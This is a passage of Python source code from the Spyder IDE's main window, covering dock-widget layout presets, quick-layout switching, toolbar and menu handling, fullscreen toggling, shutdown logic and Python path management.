except Exception as error:
print("%s: %s" % (plugin, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
def setup_default_layouts(self, index, settings):
"""Setup default layouts when run for the first time."""
self.setUpdatesEnabled(False)
first_spyder_run = bool(self.first_spyder_run) # Store copy
if first_spyder_run:
self.set_window_settings(*settings)
else:
if self.last_plugin:
if self.last_plugin._ismaximized:
self.maximize_dockwidget(restore=True)
if not (self.isMaximized() or self.maximized_flag):
self.showMaximized()
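            # Fix the window width temporarily so that rearranging the
            # dockwidgets below doesn't resize the window; the original
            # min/max limits are restored at the end of this method.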
min_width = self.minimumWidth()
max_width = self.maximumWidth()
base_width = self.width()
self.setFixedWidth(base_width)
# IMPORTANT: order has to be the same as defined in the config file
MATLAB, RSTUDIO, VERTICAL, HORIZONTAL = range(self.DEFAULT_LAYOUTS)
# Define widgets locally
editor = self.editor
console_ipy = self.ipyconsole
console_int = self.console
outline = self.outlineexplorer
explorer_project = self.projects
explorer_file = self.explorer
explorer_variable = self.variableexplorer
plots = self.plots
history = self.historylog
finder = self.findinfiles
help_plugin = self.help
helper = self.onlinehelp
plugins = self.thirdparty_plugins
# Stored for tests
global_hidden_widgets = [finder, console_int, explorer_project,
helper] + plugins
global_hidden_toolbars = [self.source_toolbar, self.edit_toolbar,
self.search_toolbar]
# Layout definition
# --------------------------------------------------------------------
# Layouts are organized by columns, each column is organized by rows.
        # Widths have to sum to 100 (except for hidden widgets); the row
        # heights in each column have to sum to 100 as well.
# Spyder Default Initial Layout
s_layout = {
'widgets': [
# Column 0
[[explorer_project]],
# Column 1
[[editor]],
# Column 2
[[outline]],
# Column 3
[[help_plugin, explorer_variable, plots, # Row 0
helper, explorer_file, finder] + plugins,
[console_int, console_ipy, history]] # Row 1
],
'width fraction': [15, # Column 0 width
45, # Column 1 width
5, # Column 2 width
45], # Column 3 width
'height fraction': [[100], # Column 0, row heights
[100], # Column 1, row heights
[100], # Column 2, row heights
[46, 54]], # Column 3, row heights
'hidden widgets': [outline] + global_hidden_widgets,
'hidden toolbars': [],
}
# RStudio
r_layout = {
'widgets': [
# column 0
[[editor], # Row 0
[console_ipy, console_int]], # Row 1
# column 1
[[explorer_variable, plots, history, # Row 0
outline, finder] + plugins,
[explorer_file, explorer_project, # Row 1
help_plugin, helper]]
],
'width fraction': [55, # Column 0 width
45], # Column 1 width
'height fraction': [[55, 45], # Column 0, row heights
[55, 45]], # Column 1, row heights
'hidden widgets': [outline] + global_hidden_widgets,
'hidden toolbars': [],
}
# Matlab
m_layout = {
'widgets': [
# column 0
[[explorer_file, explorer_project],
[outline]],
# column 1
[[editor],
[console_ipy, console_int]],
# column 2
[[explorer_variable, plots, finder] + plugins,
[history, help_plugin, helper]]
],
'width fraction': [10, # Column 0 width
45, # Column 1 width
45], # Column 2 width
'height fraction': [[55, 45], # Column 0, row heights
[55, 45], # Column 1, row heights
[55, 45]], # Column 2, row heights
'hidden widgets': global_hidden_widgets,
'hidden toolbars': [],
}
# Vertically split
v_layout = {
'widgets': [
# column 0
[[editor], # Row 0
[console_ipy, console_int, explorer_file, # Row 1
explorer_project, help_plugin, explorer_variable, plots,
history, outline, finder, helper] + plugins]
],
'width fraction': [100], # Column 0 width
'height fraction': [[55, 45]], # Column 0, row heights
'hidden widgets': [outline] + global_hidden_widgets,
'hidden toolbars': [],
}
# Horizontally split
h_layout = {
'widgets': [
# column 0
[[editor]], # Row 0
# column 1
[[console_ipy, console_int, explorer_file, # Row 0
explorer_project, help_plugin, explorer_variable, plots,
history, outline, finder, helper] + plugins]
],
'width fraction': [55, # Column 0 width
45], # Column 1 width
'height fraction': [[100], # Column 0, row heights
[100]], # Column 1, row heights
'hidden widgets': [outline] + global_hidden_widgets,
'hidden toolbars': []
}
# Layout selection
layouts = {
'default': s_layout,
RSTUDIO: r_layout,
MATLAB: m_layout,
VERTICAL: v_layout,
HORIZONTAL: h_layout,
}
layout = layouts[index]
# Remove None from widgets layout
widgets_layout = layout['widgets']
widgets_layout_clean = []
for column in widgets_layout:
clean_col = []
for row in column:
clean_row = [w for w in row if w is not None]
if clean_row:
clean_col.append(clean_row)
if clean_col:
widgets_layout_clean.append(clean_col)
# Flatten widgets list
widgets = []
for column in widgets_layout_clean:
for row in column:
for widget in row:
widgets.append(widget)
        # We use both directions to ensure a proper update when moving from
        # 'Horizontal Split' to 'Spyder Default'. This also seems to help in
        # random cases where the display seems 'empty'.
for direction in (Qt.Vertical, Qt.Horizontal):
# Arrange the widgets in one direction
for idx in range(len(widgets) - 1):
first, second = widgets[idx], widgets[idx+1]
if first is not None and second is not None:
self.splitDockWidget(first.dockwidget, second.dockwidget,
direction)
# Arrange the widgets in the other direction
for column in widgets_layout_clean:
for idx in range(len(column) - 1):
first_row, second_row = column[idx], column[idx+1]
self.splitDockWidget(first_row[0].dockwidget,
second_row[0].dockwidget,
Qt.Vertical)
# Tabify
for column in widgets_layout_clean:
for row in column:
for idx in range(len(row) - 1):
first, second = row[idx], row[idx+1]
self.tabify_plugins(first, second)
# Raise front widget per row
row[0].dockwidget.show()
row[0].dockwidget.raise_()
# Set dockwidget widths
width_fractions = layout['width fraction']
if len(width_fractions) > 1:
_widgets = [col[0][0].dockwidget for col in widgets_layout]
self.resizeDocks(_widgets, width_fractions, Qt.Horizontal)
# Set dockwidget heights
height_fractions = layout['height fraction']
for idx, column in enumerate(widgets_layout_clean):
if len(column) > 1:
_widgets = [row[0].dockwidget for row in column]
self.resizeDocks(_widgets, height_fractions[idx], Qt.Vertical)
# Hide toolbars
hidden_toolbars = global_hidden_toolbars + layout['hidden toolbars']
for toolbar in hidden_toolbars:
if toolbar is not None:
toolbar.close()
# Hide widgets
hidden_widgets = layout['hidden widgets']
for widget in hidden_widgets:
if widget is not None:
widget.dockwidget.close()
if first_spyder_run:
self.first_spyder_run = False
else:
self.setMinimumWidth(min_width)
self.setMaximumWidth(max_width)
if not (self.isMaximized() or self.maximized_flag):
self.showMaximized()
self.setUpdatesEnabled(True)
self.sig_layout_setup_ready.emit(layout)
return layout
@Slot()
def toggle_previous_layout(self):
""" """
self.toggle_layout('previous')
@Slot()
def toggle_next_layout(self):
""" """
self.toggle_layout('next')
def toggle_layout(self, direction='next'):
""" """
get = CONF.get
names = get('quick_layouts', 'names')
order = get('quick_layouts', 'order')
active = get('quick_layouts', 'active')
if len(active) == 0:
return
layout_index = ['default']
for name in order:
if name in active:
layout_index.append(names.index(name))
current_layout = self.current_quick_layout
dic = {'next': 1, 'previous': -1}
if current_layout is None:
# Start from default
current_layout = 'default'
if current_layout in layout_index:
current_index = layout_index.index(current_layout)
else:
current_index = 0
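        # Step to the next/previous layout, wrapping around the ends of the
        # list of active layouts.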
new_index = (current_index + dic[direction]) % len(layout_index)
self.quick_layout_switch(layout_index[new_index])
def quick_layout_set_menu(self):
""" """
get = CONF.get
names = get('quick_layouts', 'names')
order = get('quick_layouts', 'order')
active = get('quick_layouts', 'active')
ql_actions = [create_action(self, _('Spyder Default Layout'),
triggered=lambda:
self.quick_layout_switch('default'))]
for name in order:
if name in active:
index = names.index(name)
# closure required so lambda works with the default parameter
def trigger(i=index, self=self):
return lambda: self.quick_layout_switch(i)
qli_act = create_action(self, name, triggered=trigger())
# closure above replaces the following which stopped working
# qli_act = create_action(self, name, triggered=lambda i=index:
# self.quick_layout_switch(i)
ql_actions += [qli_act]
self.ql_save = create_action(self, _("Save current layout"),
triggered=lambda:
self.quick_layout_save(),
context=Qt.ApplicationShortcut)
self.ql_preferences = create_action(self, _("Layout preferences"),
triggered=lambda:
self.quick_layout_settings(),
context=Qt.ApplicationShortcut)
self.ql_reset = create_action(self, _('Reset to spyder default'),
triggered=self.reset_window_layout)
self.register_shortcut(self.ql_save, "_", "Save current layout")
self.register_shortcut(self.ql_preferences, "_", "Layout preferences")
ql_actions += [None]
ql_actions += [self.ql_save, self.ql_preferences, self.ql_reset]
self.quick_layout_menu.clear()
add_actions(self.quick_layout_menu, ql_actions)
if len(order) == 0:
self.ql_preferences.setEnabled(False)
else:
self.ql_preferences.setEnabled(True)
@Slot()
def reset_window_layout(self):
"""Reset window layout to default"""
answer = QMessageBox.warning(self, _("Warning"),
_("Window layout will be reset to default settings: "
"this affects window position, size and dockwidgets.\n"
"Do you want to continue?"),
QMessageBox.Yes | QMessageBox.No)
if answer == QMessageBox.Yes:
self.setup_layout(default=True)
def quick_layout_save(self):
"""Save layout dialog"""
get = CONF.get
set_ = CONF.set
names = get('quick_layouts', 'names')
order = get('quick_layouts', 'order')
active = get('quick_layouts', 'active')
dlg = self.dialog_layout_save(self, names)
if dlg.exec_():
name = dlg.combo_box.currentText()
if name in names:
                answer = QMessageBox.warning(
                    self, _("Warning"),
                    _("Layout <b>%s</b> will be overwritten. "
                      "Do you want to continue?") % name,
                    QMessageBox.Yes | QMessageBox.No)
index = order.index(name)
else:
answer = True
if None in names:
index = names.index(None)
names[index] = name
else:
index = len(names)
names.append(name)
order.append(name)
            # Always make a new layout active, even if it overwrites an
            # inactive layout
if name not in active:
active.append(name)
if answer:
self.save_current_window_settings('layout_{}/'.format(index),
section='quick_layouts')
set_('quick_layouts', 'names', names)
set_('quick_layouts', 'order', order)
set_('quick_layouts', 'active', active)
self.quick_layout_set_menu()
def quick_layout_settings(self):
"""Layout settings dialog"""
get = CONF.get
set_ = CONF.set
section = 'quick_layouts'
names = get(section, 'names')
order = get(section, 'order')
active = get(section, 'active')
dlg = self.dialog_layout_settings(self, names, order, active)
if dlg.exec_():
set_(section, 'names', dlg.names)
set_(section, 'order', dlg.order)
set_(section, 'active', dlg.active)
self.quick_layout_set_menu()
def quick_layout_switch(self, index):
"""Switch to quick layout number *index*"""
section = 'quick_layouts'
try:
settings = self.load_window_settings('layout_{}/'.format(index),
section=section)
(hexstate, window_size, prefs_dialog_size, pos, is_maximized,
is_fullscreen) = settings
            # The default layouts will always be regenerated unless there was
            # an overwrite, either by rewriting with the same name, or by
            # deleting and then creating a new one
if hexstate is None:
# The value for hexstate shouldn't be None for a custom saved
# layout (ie, where the index is greater than the number of
# defaults). See spyder-ide/spyder#6202.
if index != 'default' and index >= self.DEFAULT_LAYOUTS:
QMessageBox.critical(
self, _("Warning"),
_("Error opening the custom layout. Please close"
" Spyder and try again. If the issue persists,"
" then you must use 'Reset to Spyder default' "
"from the layout menu."))
return
self.setup_default_layouts(index, settings)
except cp.NoOptionError:
QMessageBox.critical(self, _("Warning"),
_("Quick switch layout #%s has not yet "
"been defined.") % str(index))
return
# TODO: is there any real use in calling the previous layout
# setting?
# self.previous_layout_settings = self.get_window_settings()
self.set_window_settings(*settings)
self.current_quick_layout = index
# make sure the flags are correctly set for visible panes
for plugin in (self.widgetlist + self.thirdparty_plugins):
action = plugin._toggle_view_action
action.setChecked(plugin.dockwidget.isVisible())
# TODO: To be removed after all actions are moved to their corresponding
# plugins
def register_shortcut(self, qaction_or_qshortcut, context, name,
add_shortcut_to_tip=True, plugin_name=None):
self.shortcuts.register_shortcut(
qaction_or_qshortcut,
context,
name,
add_shortcut_to_tip=add_shortcut_to_tip,
plugin_name=plugin_name,
)
# --- Show/Hide toolbars
def _update_show_toolbars_action(self):
"""Update the text displayed in the menu entry."""
if self.toolbars_visible:
text = _("Hide toolbars")
tip = _("Hide toolbars")
else:
text = _("Show toolbars")
tip = _("Show toolbars")
self.show_toolbars_action.setText(text)
self.show_toolbars_action.setToolTip(tip)
def save_visible_toolbars(self):
"""Saves the name of the visible toolbars in the .ini file."""
toolbars = []
for toolbar in self.visible_toolbars:
toolbars.append(toolbar.objectName())
CONF.set('main', 'last_visible_toolbars', toolbars)
def get_visible_toolbars(self):
"""Collects the visible toolbars."""
toolbars = []
for toolbar in self.toolbarslist:
if toolbar.toggleViewAction().isChecked():
toolbars.append(toolbar)
self.visible_toolbars = toolbars
def load_last_visible_toolbars(self):
"""Loads the last visible toolbars from the .ini file."""
toolbars_names = CONF.get('main', 'last_visible_toolbars', default=[])
if toolbars_names:
dic = {}
for toolbar in self.toolbarslist:
dic[toolbar.objectName()] = toolbar
toolbars = []
for name in toolbars_names:
if name in dic:
toolbars.append(dic[name])
self.visible_toolbars = toolbars
else:
self.get_visible_toolbars()
self._update_show_toolbars_action()
@Slot()
def show_toolbars(self):
"""Show/Hides toolbars."""
value = not self.toolbars_visible
CONF.set('main', 'toolbars_visible', value)
if value:
self.save_visible_toolbars()
else:
self.get_visible_toolbars()
for toolbar in self.visible_toolbars:
toolbar.toggleViewAction().setChecked(value)
toolbar.setVisible(value)
self.toolbars_visible = value
self._update_show_toolbars_action()
# --- Other
def update_execution_state_kernel(self):
"""Handle execution state of the current console."""
try:
self.ipyconsole.update_execution_state_kernel()
except AttributeError:
return
def valid_project(self):
"""Handle an invalid active project."""
try:
path = self.projects.get_active_project_path()
except AttributeError:
return
if bool(path):
if not self.projects.is_valid_project(path):
if path:
QMessageBox.critical(
self,
_('Error'),
_("<b>{}</b> is no longer a valid Spyder project! "
"Since it is the current active project, it will "
"be closed automatically.").format(path))
self.projects.close_project()
def free_memory(self):
"""Free memory after event."""
gc.collect()
def plugin_focus_changed(self):
"""Focus has changed from one plugin to another"""
self.update_edit_menu()
self.update_search_menu()
def show_shortcuts(self, menu):
"""Show action shortcuts in menu."""
menu_actions = menu.actions()
for action in menu_actions:
if getattr(action, '_shown_shortcut', False):
# This is a SpyderAction
if action._shown_shortcut is not None:
action.setShortcut(action._shown_shortcut)
elif action.menu() is not None:
                # This is a submenu, so we need to call this again
self.show_shortcuts(action.menu())
else:
# We don't need to do anything for other elements
continue
def hide_shortcuts(self, menu):
"""Hide action shortcuts in menu."""
menu_actions = menu.actions()
for action in menu_actions:
if getattr(action, '_shown_shortcut', False):
# This is a SpyderAction
if action._shown_shortcut is not None:
action.setShortcut(QKeySequence())
elif action.menu() is not None:
                # This is a submenu, so we need to call this again
self.hide_shortcuts(action.menu())
else:
# We don't need to do anything for other elements
continue
def hide_options_menus(self):
"""Hide options menu when menubar is pressed in macOS."""
for plugin in self.widgetlist + self.thirdparty_plugins:
if plugin.CONF_SECTION == 'editor':
editorstack = self.editor.get_current_editorstack()
editorstack.menu.hide()
else:
try:
# New API
plugin.options_menu.hide()
except AttributeError:
# Old API
plugin._options_menu.hide()
def get_focus_widget_properties(self):
"""Get properties of focus widget
Returns tuple (widget, properties) where properties is a tuple of
booleans: (is_console, not_readonly, readwrite_editor)"""
from spyder.plugins.editor.widgets.editor import TextEditBaseWidget
from spyder.plugins.ipythonconsole.widgets import ControlWidget
widget = QApplication.focusWidget()
textedit_properties = None
if isinstance(widget, (TextEditBaseWidget, ControlWidget)):
console = isinstance(widget, ControlWidget)
not_readonly = not widget.isReadOnly()
readwrite_editor = not_readonly and not console
textedit_properties = (console, not_readonly, readwrite_editor)
return widget, textedit_properties
def update_edit_menu(self):
"""Update edit menu"""
widget, textedit_properties = self.get_focus_widget_properties()
if textedit_properties is None: # widget is not an editor/console
return
# !!! Below this line, widget is expected to be a QPlainTextEdit
# instance
console, not_readonly, readwrite_editor = textedit_properties
# Editor has focus and there is no file opened in it
if (not console and not_readonly and self.editor
and not self.editor.is_file_opened()):
return
# Disabling all actions to begin with
for child in self.edit_menu.actions():
child.setEnabled(False)
self.selectall_action.setEnabled(True)
# Undo, redo
self.undo_action.setEnabled( readwrite_editor \
and widget.document().isUndoAvailable() )
self.redo_action.setEnabled( readwrite_editor \
and widget.document().isRedoAvailable() )
# Copy, cut, paste, delete
has_selection = widget.has_selected_text()
self.copy_action.setEnabled(has_selection)
self.cut_action.setEnabled(has_selection and not_readonly)
self.paste_action.setEnabled(not_readonly)
# Comment, uncomment, indent, unindent...
if not console and not_readonly:
# This is the editor and current file is writable
if self.editor:
for action in self.editor.edit_menu_actions:
action.setEnabled(True)
def update_search_menu(self):
"""Update search menu"""
# Disabling all actions except the last one
# (which is Find in files) to begin with
for child in self.search_menu.actions()[:-1]:
child.setEnabled(False)
widget, textedit_properties = self.get_focus_widget_properties()
if textedit_properties is None: # widget is not an editor/console
return
# !!! Below this line, widget is expected to be a QPlainTextEdit
# instance
console, not_readonly, readwrite_editor = textedit_properties
# Find actions only trigger an effect in the Editor
if not console:
for action in self.search_menu.actions():
try:
action.setEnabled(True)
except RuntimeError:
pass
# Disable the replace action for read-only files
if len(self.search_menu_actions) > 3:
self.search_menu_actions[3].setEnabled(readwrite_editor)
def create_plugins_menu(self):
order = ['editor', 'ipython_console', 'variable_explorer',
'help', 'plots', None, 'explorer', 'outline_explorer',
'project_explorer', 'find_in_files', None, 'historylog',
'profiler', 'breakpoints', 'pylint', None,
'onlinehelp', 'internal_console', None]
for plugin in self.widgetlist:
try:
# New API
action = plugin.toggle_view_action
except AttributeError:
# Old API
action = plugin._toggle_view_action
if action:
action.setChecked(plugin.dockwidget.isVisible())
try:
name = plugin.CONF_SECTION
pos = order.index(name)
except ValueError:
pos = None
if pos is not None:
order[pos] = action
else:
order.append(action)
actions = order[:]
for action in order:
if type(action) is str:
actions.remove(action)
self.plugins_menu_actions = actions
add_actions(self.plugins_menu, actions)
def create_toolbars_menu(self):
order = ['file_toolbar', 'run_toolbar', 'debug_toolbar',
'main_toolbar', 'Global working directory', None,
'search_toolbar', 'edit_toolbar', 'source_toolbar']
for toolbar in self.toolbarslist:
action = toolbar.toggleViewAction()
name = toolbar.objectName()
try:
pos = order.index(name)
except ValueError:
pos = None
if pos is not None:
order[pos] = action
else:
order.append(action)
add_actions(self.toolbars_menu, order)
def createPopupMenu(self):
menu = QMenu('', self)
actions = self.help_menu_actions[:3] + \
[None, self.help_menu_actions[-1]]
add_actions(menu, actions)
return menu
def set_splash(self, message):
"""Set splash message"""
if self.splash is None:
return
if message:
logger.info(message)
self.splash.show()
self.splash.showMessage(message,
int(Qt.AlignBottom | Qt.AlignCenter |
Qt.AlignAbsolute),
QColor(Qt.white))
QApplication.processEvents()
def closeEvent(self, event):
"""closeEvent reimplementation"""
if self.closing(True):
event.accept()
else:
event.ignore()
def resizeEvent(self, event):
"""Reimplement Qt method"""
if not self.isMaximized() and not self.fullscreen_flag:
self.window_size = self.size()
QMainWindow.resizeEvent(self, event)
# To be used by the tour to be able to resize
self.sig_resized.emit(event)
def moveEvent(self, event):
"""Reimplement Qt method"""
if not self.isMaximized() and not self.fullscreen_flag:
self.window_position = self.pos()
QMainWindow.moveEvent(self, event)
# To be used by the tour to be able to move
self.sig_moved.emit(event)
def hideEvent(self, event):
"""Reimplement Qt method"""
try:
for plugin in (self.widgetlist + self.thirdparty_plugins):
# TODO: Remove old API
try:
# New API
if plugin.get_widget().isAncestorOf(
self.last_focused_widget):
plugin.change_visibility(True)
except AttributeError:
# Old API
if plugin.isAncestorOf(self.last_focused_widget):
plugin._visibility_changed(True)
QMainWindow.hideEvent(self, event)
except RuntimeError:
QMainWindow.hideEvent(self, event)
def change_last_focused_widget(self, old, now):
"""To keep track of to the last focused widget"""
if (now is None and QApplication.activeWindow() is not None):
QApplication.activeWindow().setFocus()
self.last_focused_widget = QApplication.focusWidget()
elif now is not None:
self.last_focused_widget = now
self.previous_focused_widget = old
def closing(self, cancelable=False):
"""Exit tasks"""
if self.already_closed or self.is_starting_up:
return True
if cancelable and CONF.get('main', 'prompt_on_exit'):
reply = QMessageBox.critical(self, 'Spyder',
'Do you really want to exit?',
QMessageBox.Yes, QMessageBox.No)
if reply == QMessageBox.No:
return False
if CONF.get('main', 'single_instance') and self.open_files_server:
self.open_files_server.close()
if not self.completions.closing_plugin(cancelable):
return False
for plugin in (self.widgetlist + self.thirdparty_plugins):
# New API
try:
plugin.close_window()
if not plugin.on_close(cancelable):
return False
except AttributeError:
pass
# Old API
try:
plugin._close_window()
if not plugin.closing_plugin(cancelable):
return False
except AttributeError:
pass
# Save window settings *after* closing all plugin windows, in order
# to show them in their previous locations in the next session.
# Fixes spyder-ide/spyder#12139
prefix = 'window' + '/'
self.save_current_window_settings(prefix)
self.dialog_manager.close_all()
if self.toolbars_visible:
self.save_visible_toolbars()
self.completions.shutdown()
self.already_closed = True
return True
def add_dockwidget(self, plugin):
"""
Add a plugin QDockWidget to the main window.
"""
try:
# New API
if plugin.is_compatible:
dockwidget, location = plugin.create_dockwidget(self)
if CONF.get('main', 'vertical_dockwidget_titlebars'):
dockwidget.setFeatures(
dockwidget.features()
| QDockWidget.DockWidgetVerticalTitleBar)
self.addDockWidget(location, dockwidget)
self.widgetlist.append(plugin)
except AttributeError:
# Old API
if plugin._is_compatible:
dockwidget, location = plugin._create_dockwidget()
if CONF.get('main', 'vertical_dockwidget_titlebars'):
dockwidget.setFeatures(
dockwidget.features()
| QDockWidget.DockWidgetVerticalTitleBar)
self.addDockWidget(location, dockwidget)
self.widgetlist.append(plugin)
@Slot()
def close_current_dockwidget(self):
widget = QApplication.focusWidget()
for plugin in (self.widgetlist + self.thirdparty_plugins):
# TODO: remove old API
try:
# New API
if plugin.get_widget().isAncestorOf(widget):
plugin._toggle_view_action.setChecked(False)
break
except AttributeError:
# Old API
if plugin.isAncestorOf(widget):
plugin._toggle_view_action.setChecked(False)
break
def toggle_lock(self, value):
"""Lock/Unlock dockwidgets and toolbars"""
self.interface_locked = value
CONF.set('main', 'panes_locked', value)
self.lock_interface_action.setIcon(
ima.icon('lock' if self.interface_locked else 'lock_open'))
self.lock_interface_action.setText(
_("Unlock panes and toolbars") if self.interface_locked else
_("Lock panes and toolbars"))
# Apply lock to panes
for plugin in (self.widgetlist + self.thirdparty_plugins):
if self.interface_locked:
if plugin.dockwidget.isFloating():
plugin.dockwidget.setFloating(False)
plugin.dockwidget.remove_title_bar()
else:
plugin.dockwidget.set_title_bar()
# Apply lock to toolbars
for toolbar in self.toolbarslist:
if self.interface_locked:
toolbar.setMovable(False)
else:
toolbar.setMovable(True)
def __update_maximize_action(self):
if self.state_before_maximizing is None:
text = _("Maximize current pane")
tip = _("Maximize current pane")
icon = ima.icon('maximize')
else:
text = _("Restore current pane")
tip = _("Restore pane to its original size")
icon = ima.icon('unmaximize')
self.maximize_action.setText(text)
self.maximize_action.setIcon(icon)
self.maximize_action.setToolTip(tip)
@Slot()
@Slot(bool)
def maximize_dockwidget(self, restore=False):
"""Shortcut: Ctrl+Alt+Shift+M
First call: maximize current dockwidget
Second call (or restore=True): restore original window layout"""
if self.state_before_maximizing is None:
if restore:
return
# Select plugin to maximize
self.state_before_maximizing = self.saveState()
focus_widget = QApplication.focusWidget()
for plugin in (self.widgetlist + self.thirdparty_plugins):
plugin.dockwidget.hide()
try:
# New API
if plugin.get_widget().isAncestorOf(focus_widget):
self.last_plugin = plugin
except Exception:
# Old API
if plugin.isAncestorOf(focus_widget):
self.last_plugin = plugin
# Only plugins that have a dockwidget are part of widgetlist,
            # so last_plugin can be None after the above "for" loop.
# For example, this happens if, after Spyder has started, focus
# is set to the Working directory toolbar (which doesn't have
# a dockwidget) and then you press the Maximize button
if self.last_plugin is None:
# Using the Editor as default plugin to maximize
self.last_plugin = self.editor
# Maximize last_plugin
self.last_plugin.dockwidget.toggleViewAction().setDisabled(True)
try:
# New API
self.setCentralWidget(self.last_plugin.get_widget())
except AttributeError:
# Old API
self.setCentralWidget(self.last_plugin)
self.last_plugin._ismaximized = True
# Workaround to solve an issue with editor's outline explorer:
# (otherwise the whole plugin is hidden and so is the outline explorer
# and the latter won't be refreshed if not visible)
try:
# New API
self.last_plugin.get_widget().show()
self.last_plugin.change_visibility(True)
except AttributeError:
# Old API
self.last_plugin.show()
self.last_plugin._visibility_changed(True)
if self.last_plugin is self.editor:
# Automatically show the outline if the editor was maximized:
self.addDockWidget(Qt.RightDockWidgetArea,
self.outlineexplorer.dockwidget)
self.outlineexplorer.dockwidget.show()
else:
# Restore original layout (before maximizing current dockwidget)
try:
# New API
self.last_plugin.dockwidget.setWidget(
self.last_plugin.get_widget())
except AttributeError:
# Old API
self.last_plugin.dockwidget.setWidget(self.last_plugin)
self.last_plugin.dockwidget.toggleViewAction().setEnabled(True)
self.setCentralWidget(None)
try:
# New API
self.last_plugin.get_widget().is_maximized = False
except AttributeError:
# Old API
self.last_plugin._ismaximized = False
self.restoreState(self.state_before_maximizing)
self.state_before_maximizing = None
try:
# New API
self.last_plugin.get_widget().get_focus_widget().setFocus()
except AttributeError:
# Old API
self.last_plugin.get_focus_widget().setFocus()
self.__update_maximize_action()
def __update_fullscreen_action(self):
if self.fullscreen_flag:
icon = ima.icon('window_nofullscreen')
else:
icon = ima.icon('window_fullscreen')
if is_text_string(icon):
icon = get_icon(icon)
self.fullscreen_action.setIcon(icon)
@Slot()
def toggle_fullscreen(self):
if self.fullscreen_flag:
self.fullscreen_flag = False
if os.name == 'nt':
self.setWindowFlags(
self.windowFlags()
^ (Qt.FramelessWindowHint | Qt.WindowStaysOnTopHint))
self.setGeometry(self.saved_normal_geometry)
self.showNormal()
if self.maximized_flag:
self.showMaximized()
else:
self.maximized_flag = self.isMaximized()
self.fullscreen_flag = True
self.saved_normal_geometry = self.normalGeometry()
if os.name == 'nt':
# Due to limitations of the Windows DWM, compositing is not
# handled correctly for OpenGL based windows when going into
# full screen mode, so we need to use this workaround.
# See spyder-ide/spyder#4291.
self.setWindowFlags(self.windowFlags()
| Qt.FramelessWindowHint
| Qt.WindowStaysOnTopHint)
screen_number = QDesktopWidget().screenNumber(self)
if screen_number < 0:
screen_number = 0
r = QApplication.desktop().screenGeometry(screen_number)
self.setGeometry(
r.left() - 1, r.top() - 1, r.width() + 2, r.height() + 2)
self.showNormal()
else:
self.showFullScreen()
self.__update_fullscreen_action()
def add_to_toolbar(self, toolbar, widget):
"""Add widget actions to toolbar"""
actions = widget.toolbar_actions
if actions is not None:
add_actions(toolbar, actions)
@Slot()
def show_about(self):
"""Show About Spyder dialog box"""
from spyder.widgets.about import AboutDialog
abt = AboutDialog(self)
abt.show()
@Slot()
def show_dependencies(self):
"""Show Spyder's Dependencies dialog box"""
from spyder.widgets.dependencies import DependenciesDialog
dlg = DependenciesDialog(self)
dlg.set_data(dependencies.DEPENDENCIES)
dlg.show()
@Slot()
def report_issue(self):
"""Report a Spyder issue to github."""
from spyder.widgets.reporterror import SpyderErrorDialog
self._report_dlg = SpyderErrorDialog(self, is_report=True)
self._report_dlg.set_color_scheme(CONF.get('appearance', 'selected'))
self._report_dlg.show()
@Slot()
def trouble_guide(self):
"""Open Spyder troubleshooting guide in a web browser."""
url = QUrl(__trouble_url__)
QDesktopServices.openUrl(url)
@Slot()
def google_group(self):
"""Open Spyder Google Group in a web browser."""
url = QUrl(__forum_url__)
QDesktopServices.openUrl(url)
@Slot()
def global_callback(self):
"""Global callback"""
widget = QApplication.focusWidget()
action = self.sender()
callback = from_qvariant(action.data(), to_text_string)
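        # The triggering action stores, in its data, the name of the method
        # to call on the focused widget (e.g. 'copy').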
from spyder.plugins.editor.widgets.editor import TextEditBaseWidget
from spyder.plugins.ipythonconsole.widgets import ControlWidget
if isinstance(widget, (TextEditBaseWidget, ControlWidget)):
getattr(widget, callback)()
else:
return
def redirect_internalshell_stdio(self, state):
if state:
self.console.redirect_stds()
else:
self.console.restore_stds()
def open_external_console(self, fname, wdir, args, interact, debug, python,
python_args, systerm, post_mortem=False):
"""Open external console"""
if systerm:
# Running script in an external system terminal
try:
if CONF.get('main_interpreter', 'default'):
executable = get_python_executable()
else:
executable = CONF.get('main_interpreter', 'executable')
programs.run_python_script_in_terminal(
fname, wdir, args, interact, debug, python_args,
executable)
except NotImplementedError:
QMessageBox.critical(self, _("Run"),
_("Running an external system terminal "
"is not supported on platform %s."
) % os.name)
def execute_in_external_console(self, lines, focus_to_editor):
"""
        Execute lines in the IPython console and, if requested, set focus
        to the Editor.
"""
console = self.ipyconsole
console.switch_to_plugin()
console.execute_code(lines)
if focus_to_editor:
self.editor.switch_to_plugin()
def open_file(self, fname, external=False):
"""
        Open filename with the appropriate application.
        Redirect to the right widget (txt -> editor, spydata -> workspace, ...)
        or open the file outside Spyder (if its extension is not supported).
"""
fname = to_text_string(fname)
ext = osp.splitext(fname)[1]
if encoding.is_text_file(fname):
self.editor.load(fname)
elif self.variableexplorer is not None and ext in IMPORT_EXT:
self.variableexplorer.import_data(fname)
elif not external:
fname = file_uri(fname)
programs.start_file(fname)
def open_external_file(self, fname):
"""
Open external files that can be handled either by the Editor or the
variable explorer inside Spyder.
"""
fname = encoding.to_unicode_from_fs(fname)
if osp.exists(osp.join(CWD, fname)):
fpath = osp.join(CWD, fname)
elif osp.exists(fname):
fpath = fname
else:
return
if osp.isfile(fpath):
self.open_file(fpath, external=True)
elif osp.isdir(fpath):
QMessageBox.warning(
self, _("Error"),
_('To open <code>{fpath}</code> as a project with Spyder, '
'please use <code>spyder -p "{fname}"</code>.')
.format(fpath=osp.normpath(fpath), fname=fname)
)
# --- Path Manager
# ------------------------------------------------------------------------
def load_python_path(self):
"""Load path stored in Spyder configuration folder."""
if osp.isfile(self.SPYDER_PATH):
path, _x = encoding.readlines(self.SPYDER_PATH)
self.path = tuple(name for name in path if osp.isdir(name))
if osp.isfile(self.SPYDER_NOT_ACTIVE_PATH):
not_active_path, _x = encoding.readlines(
self.SPYDER_NOT_ACTIVE_PATH)
self.not_active_path = tuple(name for name in not_active_path
if osp.isdir(name))
def save_python_path(self, new_path_dict):
"""
Save path in Spyder configuration folder.
`new_path_dict` is an OrderedDict that has the new paths as keys and
the state as values. The state is `True` for active and `False` for
inactive.
"""
path = [p for p in new_path_dict]
not_active_path = [p for p in new_path_dict if not new_path_dict[p]]
try:
encoding.writelines(path, self.SPYDER_PATH)
encoding.writelines(not_active_path, self.SPYDER_NOT_ACTIVE_PATH)
except EnvironmentError as e:
logger.error(str(e))
CONF.set('main', 'spyder_pythonpath', self.get_spyder_pythonpath())
def get_spyder_pythonpath_dict(self):
"""
Return Spyder PYTHONPATH.
